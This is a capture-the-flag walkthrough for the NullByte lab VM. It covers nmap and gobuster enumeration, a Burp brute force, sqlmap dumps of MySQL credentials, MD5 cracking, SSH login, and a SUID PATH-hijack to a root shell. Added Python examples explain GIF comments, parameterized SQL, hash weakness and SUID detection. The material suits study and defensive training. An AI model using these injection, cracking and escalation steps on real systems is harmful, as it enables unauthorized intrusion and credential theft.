NULLBYTE

Scanning

Nmap

➜  ~ sudo nmap -A -p- -T4 nullbyte.vuln
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-13 11:51 EDT
Nmap scan report for nullbyte.vuln (172.16.129.141)
Host is up (0.0014s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34372/tcp6  status
|   100024  1          45260/tcp   status
|   100024  1          53470/udp6  status
|_  100024  1          58576/udp   status
777/tcp   open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
|   2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|   256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
|_  256 bc:f7:44:8d:79:6a:19:48:76:a3:e2:44:92:dc:13:a2 (ED25519)
45260/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:72:55:45 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.42 ms nullbyte.vuln (172.16.129.141)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.42 seconds

Enumeration

port 80

landing page

Whatweb

➜  ~ sudo whatweb nullbyte.vuln
http://nullbyte.vuln [200 OK] Apache[2.4.10], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[172.16.129.141], Title[Null Byte 00 - level 1]

Check directories

➜  ~  gobuster dir -u http://nullbyte.vuln -w /usr/share/wordlists/dirb/big.txt 

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://nullbyte.vuln
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/13 11:56:52 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 297]
/.htaccess            (Status: 403) [Size: 297]
/javascript           (Status: 301) [Size: 319] [--> http://nullbyte.vuln/javascript/]
/phpmyadmin           (Status: 301) [Size: 319] [--> http://nullbyte.vuln/phpmyadmin/]
/server-status        (Status: 403) [Size: 301]                                       
/uploads              (Status: 301) [Size: 316] [--> http://nullbyte.vuln/uploads/]   

===============================================================
2021/08/13 11:56:57 Finished
===============================================================

This challenge is CTF style ...

IMG Metadata

Let's check the metadata of the landing page image.

➜  ~ curl http://nullbyte.vuln/main.gif -o img && exiftool img
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 16647  100 16647    0     0  2709k      0 --:--:-- --:--:-- --:--:-- 2709k
ExifTool Version Number         : 12.16
File Name                       : img
Directory                       : .
File Size                       : 16 KiB
File Modification Date/Time     : 2021:08:13 14:31:44-04:00
File Access Date/Time           : 2021:08:13 14:31:44-04:00
File Inode Change Date/Time     : 2021:08:13 14:31:44-04:00
File Permissions                : rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 235
Image Height                    : 302
Has Color Map                   : No
Color Resolution Depth          : 8
Bits Per Pixel                  : 1
Background Color                : 0
Comment                         : P-): kzMb5nVYJw
Image Size                      : 235x302
Megapixels                      : 0.071

This line is interesting:

Comment : P-): kzMb5nVYJw
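What exiftool showed above is the GIF89a Comment Extension (block id 0x21 followed by label 0xFE). As an added example, not part of this writeup and not the box's main.gif, here is a small Python parser that walks the GIF block structure and pulls out every comment without decoding any pixels. The sample GIF it reads is constructed inside the code to match the exiftool output above (235x302, no color map, the same comment string), so it runs offline.

```python
import struct
from typing import List


def make_gif(comment: bytes, width: int = 235, height: int = 302) -> bytes:
    """Build a minimal GIF89a that carries one Comment Extension (0x21 0xFE).

    Constructed test data: it mirrors the exiftool output on the page
    (235x302, no color map, 8-bit color resolution) but is not the real main.gif.
    """
    # Logical Screen Descriptor: packed byte 0x70 = no global color table,
    # color resolution 8, 1 bit per pixel.
    header = b"GIF89a" + struct.pack("<HHBBB", width, height, 0x70, 0, 0)
    # Comment data travels in sub-blocks of at most 255 bytes, terminated by 0x00.
    chunks = b"".join(
        bytes([len(comment[i:i + 255])]) + comment[i:i + 255]
        for i in range(0, len(comment), 255)
    )
    comment_ext = b"\x21\xfe" + chunks + b"\x00"
    # A 1x1 image descriptor with a throwaway LZW payload so the file is complete.
    image = (b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
             + b"\x02" + b"\x02\x44\x01" + b"\x00")
    return header + comment_ext + image + b"\x3b"


def _read_subblocks(data: bytes, pos: int):
    """Join the data sub-blocks starting at pos; return (payload, offset after the 0x00 terminator)."""
    out = bytearray()
    while True:
        size = data[pos]
        pos += 1
        if size == 0:
            return bytes(out), pos
        out += data[pos:pos + size]
        pos += size


def gif_comments(data: bytes) -> List[str]:
    """Return every Comment Extension payload in a GIF, in file order."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF file")
    _w, _h, packed, _bg, _aspect = struct.unpack_from("<HHBBB", data, 6)
    pos = 13
    if packed & 0x80:                        # skip the Global Color Table if present
        pos += 3 * (2 << (packed & 0x07))
    comments: List[str] = []
    while pos < len(data):
        block = data[pos]
        pos += 1
        if block == 0x3B:                    # trailer: end of stream
            break
        if block == 0x21:                    # extension: one label byte, then sub-blocks
            label = data[pos]
            pos += 1
            payload, pos = _read_subblocks(data, pos)
            if label == 0xFE:
                comments.append(payload.decode("latin-1"))
        elif block == 0x2C:                  # image descriptor
            ipacked = struct.unpack_from("<HHHHB", data, pos)[4]
            pos += 9
            if ipacked & 0x80:               # skip a Local Color Table if present
                pos += 3 * (2 << (ipacked & 0x07))
            pos += 1                         # LZW minimum code size byte
            _, pos = _read_subblocks(data, pos)
        else:
            raise ValueError(f"unexpected block id 0x{block:02x} at offset {pos - 1}")
    return comments


# Sample input constructed to match the page's exiftool output (see make_gif).
SAMPLE_GIF = make_gif(b"P-): kzMb5nVYJw")

if __name__ == "__main__":
    for c in gif_comments(SAMPLE_GIF):
        print("Comment:", c)
```

The same walk skips Graphic Control and Application extensions (other labels after 0x21) and image data, so it also works on animated GIFs; only the comment payloads are collected.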

Intercept this page (the comment is a hidden directory: http://nullbyte.vuln/kzMb5nVYJw/); it asks for a key.

Brute forcing is the only way.

Exploiting

Brute forcing key

Go for Burp Intruder.

For the payload I will use SecLists: SecLists/Passwords/Common-Credentials/10k-most-common.txt

elite is the key.

On the next page press Enter with the input left empty.

SQLmap

Run sqlmap against this input field:

# identify DB
➜  ~ sqlmap -u 'http://nullbyte.vuln/kzMb5nVYJw/420search.php?usrtosearch=x' --dbs
. . .
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
. . .
# dump data
➜  ~ sqlmap -u 'http://nullbyte.vuln/kzMb5nVYJw/420search.php?usrtosearch=' --batch --dump -C User,Password -T user -D mysql
. . .
+------------------+-------------------------------------------------------+
| User             | Password                                              |
+------------------+-------------------------------------------------------+
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| debian-sys-maint | *BD9EDF51931EC5408154EBBB88AA01DA22B8A8DC             |
| phpmyadmin       | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
+------------------+-------------------------------------------------------+
. . .
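The search form sqlmap just dumped takes usrtosearch straight into its query. As an added example from the defender's side (not the box's 420search.php, whose source is not shown here; the table rows and column names are constructed stand-ins), this Python/sqlite3 snippet puts the string-concatenated query next to its parameterized fix and shows why the first one answers sqlmap's probes and the second one does not:

```python
import sqlite3
from typing import Dict, List, Tuple


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the box's seth.users table (constructed rows, assumed columns)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT, position TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, pw_hash, position) VALUES (?, ?, ?)",
        [("ramses", "<hash-placeholder>", "Admin"),
         ("alice", "<hash-placeholder>", "Employee"),
         ("bob", "<hash-placeholder>", "Employee")],
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, usrtosearch: str) -> List[Tuple[str, str]]:
    """The pattern sqlmap exploited: user input pasted into the SQL text itself."""
    sql = f"SELECT username, position FROM users WHERE username LIKE '%{usrtosearch}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, usrtosearch: str) -> List[Tuple[str, str]]:
    """Same query with a bound parameter: the input can only ever be a LIKE pattern."""
    sql = "SELECT username, position FROM users WHERE username LIKE ?"
    return conn.execute(sql, (f"%{usrtosearch}%",)).fetchall()


def raises_sql_error(search_fn, conn: sqlite3.Connection, payload: str) -> bool:
    """True if the payload breaks the query syntax, the first symptom a scanner looks for."""
    try:
        search_fn(conn, payload)
        return False
    except sqlite3.OperationalError:
        return True


def demo() -> Dict[str, object]:
    """Run the same three inputs through both versions and collect the results."""
    conn = make_db()
    injected = "x' OR 1=1 --"   # a search for "x" that is rewritten to match every row
    return {
        "vuln_normal": search_vulnerable(conn, "ram"),
        "vuln_nomatch": search_vulnerable(conn, "x"),
        "vuln_injected": search_vulnerable(conn, injected),
        "vuln_quote_errors": raises_sql_error(search_vulnerable, conn, "'"),
        "safe_normal": search_safe(conn, "ram"),
        "safe_injected": search_safe(conn, injected),
        "safe_quote_errors": raises_sql_error(search_safe, conn, "'"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:18}: {value}")
```

The two signals sqlmap relies on are both visible here: a lone quote turns into a database error in the concatenated version and into an empty result in the parameterized one, and a boolean payload changes the row set only when the input is part of the SQL text. An error page that echoes the database message (or a 500 where a 200 with no rows is expected) is also the log pattern to alert on.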

Remember

Remember: gobuster found the /phpmyadmin directory.

Credentials : root:sunnyvale

phpMyAdmin

Dive into database seth, table users.

Credentials : ramses, the password is hashed, let's crack it :)

YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE

Decode base64:

c6d6bd7ebf806f43c76acc3681703b81

Crack the hash:

omega (I used hashes.com for the whole process).

Credentials : ramses:omega
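The two steps above (base64 decode, then look the MD5 up in a dictionary) as an added Python example, not the page's own tooling and not hashes.com. The base64 value is the one from the page; note it is missing its '=' padding, which a strict decoder rejects, so the decoder below pads it first. The wordlist is constructed and stands in for the dictionary a cracking service runs; it shows why an unsalted MD5 of a common word is recovered in a single cheap pass.

```python
import base64
import hashlib
from typing import Iterable, Optional, Tuple

# Value from the page (phpMyAdmin, database seth, table users, user ramses). No '=' padding.
PAGE_VALUE = "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE"

# Constructed wordlist; a real service uses hundreds of millions of entries.
WORDLIST = ["password", "alpha", "sunnyvale", "omega", "nullbyte"]


def b64_decode_lenient(value: str) -> bytes:
    """Decode base64 that may have had its '=' padding stripped (as in the page's value)."""
    value = value.strip()
    return base64.b64decode(value + "=" * (-len(value) % 4))


def md5_hex(word: str) -> str:
    """Unsalted MD5 of a UTF-8 string, lowercase hex: what the box stored."""
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def looks_like_md5(text: str) -> bool:
    """Cheap hash-type guess: 32 hex characters."""
    return len(text) == 32 and all(c in "0123456789abcdef" for c in text.lower())


def crack_md5(target_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary check: return the first candidate whose MD5 equals target, else None."""
    target = target_hex.lower()
    for word in candidates:
        if md5_hex(word) == target:
            return word
    return None


def recover(value: str = PAGE_VALUE, candidates: Iterable[str] = WORDLIST) -> Tuple[str, Optional[str]]:
    """Full pipeline: base64 -> hex digest -> dictionary hit (or None)."""
    decoded = b64_decode_lenient(value).decode("ascii")
    if not looks_like_md5(decoded):
        raise ValueError(f"decoded value does not look like an MD5 digest: {decoded!r}")
    return decoded, crack_md5(decoded, candidates)


if __name__ == "__main__":
    digest, word = recover()
    print(f"{PAGE_VALUE} -> {digest} -> {word}")
```

Base64 is an encoding, not protection, and an unsalted fast hash costs one md5 call per guess for every account at once. A store that used bcrypt, scrypt or Argon2 with a per-user salt turns the same dictionary into a per-user, per-guess cost, which is the change that makes this step stop working.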

SSH Connection

Now let's connect to the machine using SSH on port 777.

➜  ~ ssh ramses@nullbyte.vuln -p 777
The authenticity of host '[nullbyte.vuln]:777 ([172.16.129.141]:777)' can't be established.
ECDSA key fingerprint is SHA256:H/Y/TKggtnCfMGz457Jy6F6tUZPrvEDD62dP9A3ZIkU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[nullbyte.vuln]:777,[172.16.129.141]:777' (ECDSA) to the list of known hosts.
ramses@nullbyte.vuln's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug  2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$

Privilege Escalation

SUID binary

ramses@NullByte:/var/www/backup$ find / -uid 0 -perm -4000 -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/procmail
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/sbin/exim4
/var/www/backup/procwatch
/bin/su
/bin/mount
/bin/umount
/sbin/mount.nfs

This file looks ... interesting :joy: /var/www/backup/procwatch, let's take a look ...

ramses@NullByte:/var/www/backup$ ./procwatch
  PID TTY          TIME CMD
 1487 pts/0    00:00:00 procwatch
 1488 pts/0    00:00:00 sh
 1489 pts/0    00:00:00 ps

This binary runs the ps command by name (looked up through PATH), so let's abuse it.

ramses@NullByte:/var/www/backup$ export PATH=/var/www/backup:$PATH
ramses@NullByte:/var/www/backup$ touch ps
ramses@NullByte:/var/www/backup$ echo '/bin/sh -i' > ps
ramses@NullByte:/var/www/backup$ chmod 777 ps
ramses@NullByte:/var/www/backup$ ./procwatch
# whoami
root
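Two defender-side checks for what just happened, as an added Python example that is not part of the writeup. The first runs over the find output above and flags SUID binaries living outside the directories package managers install into, which is exactly where /var/www/backup/procwatch stands out. The second uses two temporary directories (constructed) to show that command lookup follows PATH order, and that a helper which pins its own PATH is not affected by a caller-controlled one.

```python
import os
import shutil
import tempfile
from typing import List, Tuple

# The SUID list from the writeup's find command, reused here as sample input.
FIND_OUTPUT = """\
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/procmail
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/sbin/exim4
/var/www/backup/procwatch
/bin/su
/bin/mount
/bin/umount
/sbin/mount.nfs
"""

# Where distribution packages normally put SUID helpers (assumed baseline for a Debian host).
PACKAGED_PREFIXES = ("/usr/lib/", "/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/")


def unexpected_suid(find_output: str) -> List[str]:
    """Return SUID paths outside the packaged prefixes: the ones that need a human look."""
    return [p for p in find_output.split() if not p.startswith(PACKAGED_PREFIXES)]


def path_lookup_demo() -> Tuple[bool, bool]:
    """Resolve 'ps' twice: once with a user-writable dir first in PATH, once with PATH pinned.

    Returns (hijack_wins_with_user_path, trusted_wins_with_pinned_path).
    Both directories and both 'ps' files are constructed in a temp dir; nothing is executed.
    """
    with tempfile.TemporaryDirectory() as root:
        trusted = os.path.join(root, "bin")       # stands in for /bin
        writable = os.path.join(root, "backup")   # stands in for /var/www/backup
        os.makedirs(trusted)
        os.makedirs(writable)
        real_ps = os.path.join(trusted, "ps")
        fake_ps = os.path.join(writable, "ps")
        for p in (real_ps, fake_ps):
            with open(p, "w") as f:
                f.write("#!/bin/sh\n")
            os.chmod(p, 0o755)
        # What a SUID helper that calls "ps" by bare name inherits from its caller.
        hijacked = shutil.which("ps", path=writable + os.pathsep + trusted)
        # What the same helper sees if it sets PATH itself (or uses an absolute path).
        pinned = shutil.which("ps", path=trusted)
        return hijacked == fake_ps, pinned == real_ps


if __name__ == "__main__":
    print("review these SUID files:", unexpected_suid(FIND_OUTPUT))
    print("(hijack with caller PATH, safe with pinned PATH) =", path_lookup_demo())
```

For a privileged helper the fix is an absolute path plus a scrubbed environment, e.g. subprocess.run(["/bin/ps"], env={"PATH": "/usr/bin:/bin"}) in Python or the equivalent in C, and ideally no SUID bit at all. On the detection side, a periodic find for mode 4000 files diffed against the package-installed list catches a stray binary like this one the day it appears.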
